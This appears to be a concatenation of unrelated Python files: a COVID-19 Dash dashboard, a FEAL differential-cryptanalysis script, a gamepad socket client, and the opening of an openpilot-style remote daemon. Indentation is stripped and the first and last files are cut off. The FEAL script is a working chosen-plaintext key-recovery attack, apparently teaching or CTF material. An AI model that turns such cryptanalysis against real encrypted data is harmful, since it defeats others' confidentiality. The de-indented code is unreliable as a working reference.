dcc.Dropdown(id='chart', options=[{'label': k, 'value': k} for k in keys], value=shown_keys, multi=True),
dhc.Div(id='page-content', style={'min-height': '600px'}),
dhc.I([log_link, dhc.A(u'\u2318 ', title='Code', href=code_link, target='_blank', style=link_style),
'created: {}'.format(report_date), ]), ]), }
cache = create_layout()
cache_loop_lock = threading.Lock()
cache_update_lock = threading.Lock()
def format_num(n: float) -> str:
suffixes = ['', ' Thousand', ' Million', ' Billion']
i = max(0, min(3, int(math.floor(0 if n == 0 else math.log10(abs(n)) / 3))))
return ('{:,.0f}'.format(n) if int(n) == n else '{:,.2f}'.format(n)) if i <= 1 \
else '{:,.3f}{}'.format(n / 10 ** (3 * i), suffixes[i])
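# For reference, given the suffix table above:
#     format_num(999)      -> '999'
#     format_num(1500)     -> '1,500'
#     format_num(1234567)  -> '1.235 Million'
#     format_num(2.5e9)    -> '2.500 Billion'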
def log_message(*msg: str) -> None:
print('- - -', dt.datetime.now().strftime('[%d/%b/%Y %H:%M:%S]'), ' '.join(msg), flush=True)
# retrieve data from URL and return Pandas DataFrame
def data_frame_from_url(url: str) -> pd.DataFrame:
try:
return pd.read_csv(io.StringIO(requests.get(url).content.decode()))
except Exception as e:
log_message('error retrieving url {}'.format(url))
raise e
finally:
log_message('retrieved url {}'.format(url))
# Population Data
def get_population() -> pd.DataFrame:
population = data_frame_from_url(URLS['population'])[['Country', 'Country_Code', 'Year_2016']]
population.columns = ['Country', 'Code', 'Population']
for country, name_change, missing_data in [
['Bahamas, The', 'Bahamas', None], ['Brunei Darussalam', 'Brunei', None],
['Congo, Dem. Rep.', 'Congo (Kinshasa)', None], ['Congo, Rep.', 'Congo (Brazzaville)', None],
['Czech Republic', 'Czechia', None], ['Egypt, Arab Rep.', 'Egypt', None], ['Gambia, The', 'Gambia', None],
['Iran, Islamic Rep.', 'Iran', None], ['Korea, Rep.', 'Korea, South', None],
['Kyrgyz Republic', 'Kyrgyzstan', None], ['Lao PDR', 'Laos', None], ['Macedonia, FYR', 'North Macedonia', None],
['Myanmar', 'Burma', None], ['Russian Federation', 'Russia', None], ['Slovak Republic', 'Slovakia', None],
['Syrian Arab Republic', 'Syria', None], ['Venezuela, RB', 'Venezuela', None], ['Yemen, Rep.', 'Yemen', None],
['Taiwan', None, ['TWN', 23780452]]
]:
if name_change:
population.Country = population.Country.str.replace(pat=country, repl=name_change, regex=False)
if missing_data:
population.loc[len(population)] = [country] + missing_data
return population
# Retrieve Covid-19 Data
def get_covid19_data(metric: str) -> pd.DataFrame:
df = data_frame_from_url(URLS[metric]).drop(0)[['Country/Region', 'Province/State', 'Date', 'Value']]
df.Date = pd.to_datetime(df.Date)
df.Value = df.Value.astype(int)
df = df.groupby(['Country/Region', 'Date']).sum().reset_index()
df.columns = ['Country', 'Date', metric.title()]
df.Country = df.Country \
.str.replace(pat='Taiwan*', repl='Taiwan', regex=False) \
.str.replace(pat='US', repl='United States', regex=False)
return df.sort_values(by=['Country', 'Date'])
# Transform Covid-19 Data
def transform_covid19_data(population: pd.DataFrame, cases: pd.DataFrame, deaths: pd.DataFrame) -> pd.DataFrame:
df = pd.merge(cases, deaths, on=['Country', 'Date'], how='inner')
eu = df[df.Country.isin(EU)].groupby('Date').sum().reset_index('Date').sort_values('Date')
eu['Country'] = 'European Union'
world = df.groupby('Date').sum().reset_index('Date').sort_values('Date')
world['Country'] = 'World'
df = pd.concat([df, eu, world])
df = pd.merge(df, population, on=['Country'], how='left').dropna()
df = df[['Country', 'Date', 'Code', 'Population', 'Cases', 'Deaths']]
df = df.set_index(['Country', 'Date'])
df['DailyCases'] = df.Cases.diff(1)
    df.loc[df['DailyCases'] < 0, 'DailyCases'] = np.nan
df['DailyMeanCases'] = df.Cases.diff(7) / 7
    df.loc[df['DailyMeanCases'] < 0, 'DailyMeanCases'] = np.nan
df['DailyRateCases'] = df.DailyMeanCases.diff(7) / 7
df['DailyMeanCases'] = df['DailyMeanCases'].round(0)
df['DailyDeaths'] = df.Deaths.diff(1)
    df.loc[df['DailyDeaths'] < 0, 'DailyDeaths'] = np.nan
df['DailyMeanDeaths'] = df.Deaths.diff(7) / 7
    df.loc[df['DailyMeanDeaths'] < 0, 'DailyMeanDeaths'] = np.nan
df['DailyRateDeaths'] = df.DailyMeanDeaths.diff(7) / 7
df['DailyMeanDeaths'] = df['DailyMeanDeaths'].round(0)
df['WeeklyCases'] = df.Cases.diff(7)
    df.loc[df['WeeklyCases'] < 0, 'WeeklyCases'] = np.nan
df['CPM'] = 10 ** 6 * df.Cases / df.Population
df['WeeklyCPM'] = 10 ** 6 * df.WeeklyCases / df.Population
df['DailyCPM'] = df.WeeklyCPM / 7
df['DailyRateCPM'] = df.DailyCPM.diff(7) / 7
df['WeeklyDeaths'] = df.Deaths.diff(7)
    df.loc[df['WeeklyDeaths'] < 0, 'WeeklyDeaths'] = np.nan
df['DPM'] = 10 ** 6 * df.Deaths / df.Population
df['WeeklyDPM'] = 10 ** 6 * df.WeeklyDeaths / df.Population
df['DailyDPM'] = df.WeeklyDPM / 7
df['DailyRateDPM'] = df.DailyDPM.diff(7) / 7
df['CFR'] = 100 * df.Deaths / df.Cases
df['CRR'] = ((df.WeeklyCases / df.WeeklyCases.shift(7)) ** (1 / 7)).replace(np.inf, np.nan)
df['DRR'] = ((df.WeeklyDeaths / df.WeeklyDeaths.shift(7)) ** (1 / 7)).replace(np.inf, np.nan)
return df
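# CRR/DRR above are 7-day geometric-mean growth factors: if this week's case
# count is double last week's, CRR = 2 ** (1 / 7) ~= 1.104, i.e. roughly 10%
# day-on-day growth; values below 1.0 indicate a shrinking outbreak.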
# Convert Figure to Graph
def graph(figure, **kwargs) -> dcc.Graph:
return dcc.Graph(figure=figure.update_layout(height=800, title_x=0.5, **kwargs))
# Plot overview with country comparisons
def plot_comparison(df: pd.DataFrame, regions: list, last_date: dt.datetime) -> {str, dhc.Div}:
df_now = df.xs(last_date, axis=0, level=1).fillna(0).reset_index()
df_geo = df_now[~df_now.Country.isin(['World', 'European Union'])]
rag_scale = [(0.0, 'green'), (0.0625, 'yellow'), (0.25, 'orange'), (1.0, 'red')]
color_palette = ['#FD3216', '#00FE35', '#6A76FC', '#FED4C4', '#FE00CE', '#0DF9FF', '#F6F926', '#FF9616',
'#479B55', '#EEA6FB', '#DC587D', '#D626FF', '#6E899C', '#00B5F7', '#B68E00', '#C9FBE5',
'#FF0092', '#22FFA7', '#E3EE9E', '#86CE00', '#BC7196', '#7E7DCD', '#FC6955', '#E48F72']
# Plot single metric for select countries
def plot_time_series(col: str, label: str, **kwargs) -> dcc.Graph:
return graph(figure=df[col].unstack().transpose()[regions]
.figure(title=label, colors=color_palette, theme='solar', **kwargs),
legend_orientation='h', hovermode='x')
# Plot current value of single metric for every country
def plot_current(col: str, label: str, drop: list, **kwargs) -> dcc.Graph:
ds = df_now[~df_now.Country.isin(drop)][['Country', col]].nlargest(42, columns=col).sort_values(by=col)
return graph(figure=ds.figure(title=label, x='Country', y=col, kind='bar', orientation='h', **kwargs),
hovermode='y')
# Plot Scatter of current values of two metrics for every country, optional size and/or color
def plot_scatter(x: str, y: str, label: str, color: str = '', size: str = '',
drop: list = (), cutoff: int = 0) -> dcc.Graph:
params = {'x': x, 'y': y, 'title': label,
'hover_name': 'Country', 'hover_data': ['Population', 'Cases', 'Deaths', 'CPM', 'DPM', 'CFR'],
**({'color': color, 'color_continuous_scale': rag_scale} if color else {}),
**({'size': size} if size else {})}
return graph(figure=px.scatter(df_now[(~df_now.Country.isin(drop)) & (df_now.Deaths > cutoff)], **params))
# Plot single metric for every country on a map
def plot_geo(col: str, label: str, color_countries: bool, colors: list = ()) -> dcc.Graph:
colors = rag_scale if color_countries else colors if colors else ['#4C33FF']
plotter = px.choropleth if color_countries else px.scatter_geo
params = {'title': label, 'locations': 'Code',
'hover_name': 'Country', 'hover_data': ['Population', 'Cases', 'Deaths', 'CPM', 'DPM', 'CFR'],
**({'color': col, 'color_continuous_scale': colors} if color_countries
else {'size': col, 'color_discrete_sequence': colors})}
return graph(figure=plotter(df_geo, **params).update_geos(
resolution=50, showcountries=True, countrycolor='#663399', showcoastlines=True, coastlinecolor='#663399',
showland=True, landcolor='#E3E3E3', showocean=True, oceancolor='#ADD8E6',
showlakes=True, lakecolor='#ADD8E6', showrivers=True, rivercolor='#ADD8E6'))
return {
'Scatter': dhc.Div([chart for chart in [
plot_scatter(x='CPM', y='DPM', size='DPM', color='CFR', cutoff=1000,
label='Cases per Million vs Deaths per Million', ), ]]),
'Current Cases': dhc.Div([chart for chart in [
plot_current(col='Cases', label='Cases', drop=['World'], theme='polar', color=['#4C33FF']),
plot_current(col='CPM', label='Cases Per Million', drop=[], theme='polar', color=['#4C33FF']), ]]),
'Current Deaths': dhc.Div([chart for chart in [
plot_current(col='Deaths', label='Deaths', drop=['World'], theme='polar', color=['#C70039']),
plot_current(col='DPM', label='Deaths Per Million', drop=[], theme='polar', color=['#C70039']), ]]),
'Maps Cases': dhc.Div([chart for chart in [
plot_geo(col='Cases', label='Total Cases', color_countries=True),
plot_geo(col='WeeklyCases', label='Last Week Total Cases', color_countries=True),
plot_geo(col='CPM', label='Cases/Million', color_countries=True, colors=rag_scale),
plot_geo(col='WeeklyCPM', label='Last Week Cases/Million', color_countries=True), ]]),
'Maps Deaths': dhc.Div([chart for chart in [
plot_geo(col='Deaths', label='Total Deaths', color_countries=True),
plot_geo(col='WeeklyDeaths', label='Last Week Total Deaths', color_countries=True),
plot_geo(col='DPM', label='Deaths/Million', color_countries=True),
plot_geo(col='WeeklyDPM', label='Last Week Deaths/Million', color_countries=True), ]]),
'Time-series Cases': dhc.Div([chart for chart in [
plot_time_series(col='Cases', label='Total Cases'),
plot_time_series(col='WeeklyCases', label='Weekly Cases (last 7 days)', kind='bar'),
plot_time_series(col='CPM', label='Cases Per Million'),
plot_time_series(col='WeeklyCPM', label='Weekly Cases/Million', kind='bar'), ]]),
'Time-series Deaths': dhc.Div([chart for chart in [
plot_time_series(col='Deaths', label='Total Deaths'),
plot_time_series(col='WeeklyDeaths', label='Weekly Deaths (last 7 days)', kind='bar'),
plot_time_series(col='DPM', label='Deaths Per Million'),
plot_time_series(col='WeeklyDPM', label='Weekly Deaths/Million', kind='bar'), ]]),
'Time-series Rates': dhc.Div([chart for chart in [
plot_time_series(col='CFR', label='Case Fatality Rate (%)'),
plot_time_series(col='CRR', label='7 Day Mean Reproduction Rate - Cases', logy=True),
plot_time_series(col='DRR', label='7 Day Mean Reproduction Rate - Deaths', logy=True), ]]),
}
# Plot regional charts
def plot_regions(df: pd.DataFrame, regions: list, last_date: dt.datetime) -> {str, dhc.Div}:
columns, colors, titles = (list(x) for x in zip(
('Cases', '#4C33FF', 'Total Cases'),
('Deaths', '#C70039', 'Attributed Deaths'),
('DailyCases', '#4C33FF', 'Cases/Day'),
('DailyDeaths', '#C70039', 'Deaths/Day'),
('DailyMeanCases', '#4C33FF', '7 Day Average Cases/Day'),
('DailyMeanDeaths', '#C70039', '7 Day Average Deaths/Day'),
('DailyRateCases', '#4C33FF', 'Change 7 Day Average Cases/Day/Day'),
('DailyRateDeaths', '#C70039', 'Change 7 Day Average Deaths/Day/Day'),
))
def plot_region(region: str) -> dcc.Graph:
summary_values = [format_num(int(x)) for x in
df.loc[region].loc[last_date][['Population', 'Cases', 'Deaths', 'CPM', 'DPM', 'CFR']]]
title = '<b>{}</b>: ' \
'<b>{}</b> People, ' \
'<b>{}</b> Cases, ' \
'<b>{}</b> Deaths,<BR> ' \
'<b>{}</b> Cases/Mil, ' \
'<b>{}</b> Deaths/Mil, ' \
'<b>{}%</b> Case Fatality Rate ' \
'<i> as on {}</i><BR><BR>'.format(region, *summary_values, last_date.strftime('%d %b %Y'))
return graph(figure=df.loc[region][columns].figure(theme='polar', title=title, subplots=True, shape=(4, 2),
legend=False, colors=colors, subplot_titles=titles),
hovermode='x')
return {region: dhc.Div(plot_region(region)) for region in regions}
# Cufflinks
cf.go_offline()
# Dash
app = dash.Dash(__name__, external_stylesheets=['https://codepen.io/chriddyp/pen/bWLwgP.css'])
app.title = app_title
app.layout = lambda: cache['layout']
# Flask
server = app.server
@app.callback(dash.dependencies.Output('page-content', 'children'), [dash.dependencies.Input('chart', 'value')])
def update_output(value):
return [cache[v] for v in value] if isinstance(value, list) else cache[value]
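# The cache maps chart-group / region names to pre-rendered Dash Divs plus the page layout.
# update_cache() re-downloads the data and rebuilds every entry under cache_update_lock;
# if an update is already in progress the call returns False immediately.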
def update_cache() -> bool:
if not cache_update_lock.locked():
with cache_update_lock:
log_message('Updating Cache')
cache['population'] = population = cache.get('population', get_population())
df = transform_covid19_data(population, cases=get_covid19_data('cases'), deaths=get_covid19_data('deaths'))
last_date = max(df.index.get_level_values(level=1))
regions = list(df.xs(last_date, axis=0, level=1).sort_values(by='Deaths', ascending=False).index)
short_list = regions[0:32]
cache.update(comparison_charts := plot_comparison(df, short_list, last_date))
cache.update(plot_regions(df, regions, last_date))
cache.update(create_layout(keys=list(sorted(comparison_charts.keys())) + regions, shown_keys=short_list,
ds=last_date.strftime('%d %b %Y')))
log_message('Cache Updated')
return True
return False
# Refresh every 12 hours (43200 s), offset by 21600 s = 08:00 local minus the 7200 s CEST offset from UTC, i.e. reloads at 06:00/18:00 UTC (08:00/20:00 CEST)
@server.before_first_request
def update_cache_in_background():
def loop_update_cache():
if not cache_loop_lock.locked():
with cache_loop_lock:
if platform.system() == 'Darwin':
__import__('caffeine') # import has side-effects
while True:
try:
update_cache()
except Exception as e:
log_message('Exception occurred while updating cache\n', str(e))
next_reload_data_at = time.time() + 3600
else:
next_reload_data_at = ((1 + (int(time.time()) // 43200)) * 43200) + 21600
while (wait := next_reload_data_at - int(time.time())) > 0:
log_message('next reload ' + dt.datetime.fromtimestamp(next_reload_data_at).strftime('%H:%M'))
time.sleep(wait / 2)
if not cache_loop_lock.locked():
threading.Thread(target=loop_update_cache, daemon=True).start()
@server.route(status_link)
def status():
return 'updating cache' if cache_update_lock.locked() \
else 'serving {} items cached at {}'.format(len(cache), cache['report_date'])
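# text_box() renders a list of lines as a single HTML <textarea> sized to fit the content:
# rows = number of lines, cols = length of the longest line. It is used by the code and
# log views served below.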
def text_box(lines: [str, ...]) -> str:
rows = len(lines)
cols = max(len(line) for line in lines)
return '{0}{1} rows={4} cols={5} {2}{3}{0}/{1}{2}'.format('<', 'textarea', '>', '\n'.join(lines), rows, cols)
@server.route(code_link)
def code():
page = '<html><head></head><body>{}</body></html>'
return page.format(text_box(lines=inspect.getsource(sys.modules[__name__]).splitlines()))
@server.route(ld_link)
def logs():
page = '<html><head><meta http-equiv="refresh" content="10"></head><body>{}</body></html>'
if ld_file:
with open(ld_file) as infile:
return page.format(text_box([line.strip() for line in infile.readlines()]))
return page.format('')
@server.route(reload_data_link)
def reload_data():
return 'Reloaded ...' if update_cache() else 'Reloading in progress ...'
@server.route(kill_link)
def shutdown():
cmd = flask.request.environ.get('werkzeug.server.shutdown')
return 'Oops ...' if cmd is None else 'Killed' if cmd() is None else 'Hmmm ...'
def client(host_address, client_port, payload) -> str:
try:
return requests.get('http://{}:{}{}'.format(host_address, client_port, payload)).content.decode()
except requests.exceptions.ConnectionError:
return ''
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Plot Wuhan Corona Virus Covid-19 Impact around the World')
parser.add_argument('-a', '--address', type=str, help='interface address, default 0.0.0.0 (127.0.0.1 with -d)')
parser.add_argument('-p', '--port', type=int, help='interface port, default 8050 (8060 with -d)')
parser.add_argument('-d', '--dev', action='store_true', help='use cached downloads only, default false')
parser.add_argument('-k', '--kill', action='store_true', help='send kill payload to server')
parser.add_argument('-r', '--reload', action='store_true', help='send reload data payload to server')
parser.add_argument('-s', '--status', action='store_true', help='print server status')
args = parser.parse_args()
host = args.address or ('127.0.0.1' if args.dev else '0.0.0.0')
port = args.port or (8060 if args.dev else 8050)
client_cmd = kill_link if args.kill else reload_data_link if args.reload else status_link if args.status else ''
if client_cmd:
if response := client(host_address=host, client_port=port, payload=client_cmd):
log_message(response)
else:
log_message('http://{}:{} is down'.format(host, port))
exit(1)
else:
ld_file = os.path.abspath(__file__)[:-3] + ('-d.log' if args.dev else '.log')
cache = create_layout()
if args.dev:
__import__('requests_cache').install_cache('cache', expire_after=12 * 3600)
__import__('atexit').register(log_message, 'http://{}:{} down'.format(host, port))
log_message('http://{}:{} up'.format(host, port))
app.run_server(host=host, port=port)
|
differential_cryptanalysis.py
|
from collections import namedtuple, defaultdict
from FEAL import FEAL, XOR, round_function
from multiprocessing import Process, Queue
import itertools
import os
DifferentialPair = namedtuple('DifferentialPair', ['m1', 'm2', 'c1', 'c2'])
def gen_random_bytes(length):
return map(ord, os.urandom(length))
def make_diff_pair(num, cipher, diff):
ret = []
for i in xrange(num):
m1 = gen_random_bytes(8)
m2 = XOR(m1, diff)
c1 = cipher.encrypt(m1)
c2 = cipher.encrypt(m2)
ret += [DifferentialPair(m1, m2, c1, c2)]
return ret
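# Subkey search: search_round_delta() brute-forces one 4-byte round subkey, splitting the
# candidate space for the first key byte across 4 worker processes. Each worker
# (search_inner) keeps a candidate only if, for every chosen-plaintext pair, the difference
# of round_function(R ^ k_cand) equals the expected output difference (L1 ^ L2) ^ delta.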
def search_inner(k_cand_base, pairs, delta, queue):
for k_cand_3 in range(64):
for k_cand_base2 in itertools.product(range(256), repeat=3):
score = 0
k_cand = [16*k_cand_base[0] + k_cand_3, k_cand_base2[0], k_cand_base2[1], k_cand_base2[2]]
for pair in pairs:
L1, R1 = pair.c1[:4], pair.c1[4:]
L2, R2 = pair.c2[:4], pair.c2[4:]
diff1 = round_function(XOR(R1, k_cand))
diff2 = round_function(XOR(R2, k_cand))
outDiff = XOR(XOR(L1, L2), delta)
diff = XOR(diff1, diff2)
if diff == outDiff:
score += 1
else:
break
if score == len(pairs):
print '[+] Found key: %r' % (k_cand, )
queue.put(k_cand)
return
def search_round_delta(pairs, delta):
print '[+] Searching subkey which has difference %r...' % delta
q = Queue()
processes = []
for k_cand_base1 in range(4):
p = Process(target=search_inner, args=([k_cand_base1], pairs, delta, q))
p.start()
processes += [p]
k_cand = q.get(True)
for p in processes:
p.terminate()
return k_cand
def search_first(pairs):
pair = pairs[0]
R1, L1 = pair.c1[:4], pair.c1[4:]
R2, L2 = pair.c2[:4], pair.c2[4:]
mL1, mR1 = pair.m1[:4], pair.m1[4:]
mL2, mR2 = pair.m2[:4], pair.m2[4:]
R1 = XOR(L1, R1)
R2 = XOR(L2, R2)
k4 = XOR(L1, mL1)
k5 = XOR(R1, mR1)
if XOR(L1, mL1) != XOR(L2, mL2) or XOR(R1, mR1) != XOR(R2, mR2):
return None, None
return k4, k5
def round_inverse(pairs, k):
ret = []
for pair in pairs:
L1, R1 = pair.c1[:4], pair.c1[4:]
L2, R2 = pair.c2[:4], pair.c2[4:]
L1 = XOR(round_function(XOR(R1, k)), L1)
L2 = XOR(round_function(XOR(R2, k)), L2)
c1 = R1 + L1
c2 = R2 + L2
ret += [DifferentialPair(pair.m1, pair.m2, c1, c2)]
return ret
def inverse_last(pairs):
ret = []
for pair in pairs:
L1, R1 = pair.c1[:4], pair.c1[4:]
L2, R2 = pair.c2[:4], pair.c2[4:]
R1 = XOR(L1, R1)
R2 = XOR(L2, R2)
c1 = R1 + L1
c2 = R2 + L2
ret += [DifferentialPair(pair.m1, pair.m2, c1, c2)]
return ret
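# Attack outline (see main() below): undo the final swap/XOR of the ciphertext halves
# (inverse_last), recover the last round key k3 from the [2, 0, 0, 0] difference, then peel
# rounds off one at a time (round_inverse) to recover k2, then with fresh differential pairs
# k1 and k0, and finally derive the whitening keys k4/k5 from the first-round relation
# (search_first). When a later search fails, the previously recovered subkey is swapped for
# its equivalent candidate (XOR with [2, 0, 0, 0]) and the step is retried.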
def main():
k = [gen_random_bytes(4) for _ in xrange(4 + 2)]
cipher = FEAL(4, k)
m = gen_random_bytes(8)
print '[+] Target Message: %r' % m
print '[+] Target Subkeys: %r' % (k)
c = cipher.encrypt(m)
pair = make_diff_pair(2048, cipher, [0x80, 0x80, 0, 0, 0x80, 0x80, 0, 0])
pair = inverse_last(pair)
k3 = search_round_delta(pair, [2, 0, 0, 0])
pair = round_inverse(pair, k3)
k2 = search_round_delta(pair, [0x80, 0x80, 0, 0])
pair = make_diff_pair(2048, cipher, [0x80, 0x80, 0, 0, 0, 0, 0, 0])
pair = inverse_last(pair)
pair = round_inverse(pair, k3)
pair_ = round_inverse(pair, k2)
k1 = search_round_delta(pair_, [0x80, 0x80, 0, 0])
if k1 is None:
pair_ = round_inverse(pair, XOR(k2, [2, 0, 0, 0]))
k1 = search_round_delta(pair_, [0x80, 0x80, 0, 0])
k2 = XOR(k2, [2, 0, 0, 0])
pair = make_diff_pair(2048, cipher, [0x90, 0x90, 0, 0, 0x92, 0x90, 0, 0])
pair = inverse_last(pair)
pair = round_inverse(pair, k3)
pair = round_inverse(pair, k2)
pair_ = round_inverse(pair, k1)
k0 = search_round_delta(pair_, [0x90, 0x90, 0, 0])
if k0 is None:
pair_ = round_inverse(pair, XOR(k1, [2, 0, 0, 0]))
k0 = search_round_delta(pair_, [0x90, 0x90, 0, 0])
k1 = XOR(k1, [2, 0, 0, 0])
pair = make_diff_pair(2048, cipher, [0, 0, 0, 0, 0, 0, 0, 1])
pair = inverse_last(pair)
pair = round_inverse(pair, k3)
pair = round_inverse(pair, k2)
pair = round_inverse(pair, k1)
pair_ = round_inverse(pair, k0)
k4, k5 = search_first(pair_)
if k4 is None:
pair_ = round_inverse(pair, XOR(k0, [2, 0, 0, 0]))
k4, k5 = search_first(pair_)
k0 = XOR(k0, [2, 0, 0, 0])
print '[+] Subkeys: %r' % ([k0, k1, k2, k3, k4, k5])
cipher_ = FEAL(4, [k0, k1, k2, k3, k4, k5])
m2 = cipher_.decrypt(c)
print '[+] Decrypted Ciphertext: %r' % m2
print '[+] Check: %s' % (m == m2)
if __name__ == '__main__':
main()
|
client.py
|
import socket #import socket module
import time
import inputs
import threading
def receiveData(client):
while(True):
data = client.recv(1024).decode()
#print(data)
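# sendData() serializes gamepad state as comma-separated "name:value:type" fields, where the
# type suffix is 'i' for Absolute (axis) events and 'b' for Key (button) events, e.g.
# "connected:1:b,ABS_X:-1203:i,BTN_SOUTH:1:b" (event codes come from the `inputs` library;
# the example values are illustrative). When no gamepad is present it sends "connected:0:b".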
def sendData(client):
while(True):
try:
events = inputs.get_gamepad()
sendString = "connected:1:b,"
for event in events:
if(event.ev_type == "Absolute"):
sendString += event.code + ":" + str(event.state) + ":i,"
elif(event.ev_type == "Key"):
sendString += event.code + ":" + str(event.state) + ":b,"
except inputs.UnpluggedError:
sendString = "connected:0:b,"
time.sleep(0.1)
sendString = sendString[:-1] #Remove ending ","
client.send(sendString.encode())
#time.sleep(0.005)
print("Start")
ss = socket.socket() #create a socket object
ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
cs = socket.socket() #create a socket object
cs.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
cport = 12397 # Reserve a port for your service
cs.bind(('', cport)) #Bind to the port
cs.listen(5) #Wait for the client connection
c,addr = cs.accept() #Establish a connection
print("Laptop -> Pi Connected")
host = '192.168.1.42' # Host IP address
sport = 12396 #Reserve a port for your service
ss.connect((host,sport))
print("Pi -> Laptop Connected")
print ("Test")
tot = time.time()
sumTime = 0
dic = {}
receiveThread = threading.Thread(target=receiveData, args=(ss,))
sendThread = threading.Thread(target=sendData, args=(c,))
receiveThread.start()
sendThread.start()
'''
for i in range(0,100000):
print("start")
start=time.time()
data = ss.recv(1024).decode()
print("Recieve")
#print(data)
data = data.split(",")
for pair in data:
item = pair.split(":")
if(item[2] == "b"):
cast = bool
elif(item[2]=="i"):
cast = int
elif(item[2] == "f"):
cast = float
else:
cast = str
#print("Item[0]:" + item[0] + "Item
dic[item[0]] = cast(item[1])
print(str(dic))
print("done")
end = time.time()
sumTime = sumTime + (end-start)
#print ((cs.recv(1024)).decode())
'''
tot = time.time() - tot
sumTime = sumTime/100.0
print (tot, ' ',sumTime)
cs.close()
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC, TICI
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import get_version, get_git_remote, get_git_branch, get_git_commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://api.retropilot.org:4040')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = set([8022])
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id'])
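# Thread/queue layout: ws_recv feeds incoming frames into recv_queue; the jsonrpc_handler
# workers execute method calls and push responses onto send_queue, while responses to our own
# outgoing log uploads are routed to log_recv_queue. upload_handler drains upload_queue, and
# ws_send multiplexes send_queue and log_send_queue back over the websocket.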
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
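# The wire protocol is plain JSON-RPC 2.0, e.g. a request like
#   {"method": "getVersion", "jsonrpc": "2.0", "id": 0}
# is dispatched to the matching handler below and answered with
#   {"result": {...}, "id": 0, "jsonrpc": "2.0"}
# (shape shown for illustration; the exact fields depend on the jsonrpc library).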
def upload_handler(end_event):
while not end_event.is_set():
try:
item = upload_queue.get(timeout=1)
if item.id in cancelled_uploads:
cancelled_uploads.remove(item.id)
continue
_do_upload(item)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_git_remote(),
"branch": get_git_branch(),
"commit": get_git_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0):
destination = {
"latitude": latitude,
"longitude": longitude,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
@dispatcher.add_method
def listDataDirectory():
files = [os.path.relpath(os.path.join(dp, f), ROOT) for dp, dn, fn in os.walk(ROOT) for f in fn]
return files
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
return [item._asdict() for item in list(upload_queue.queue)]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
params = Params()
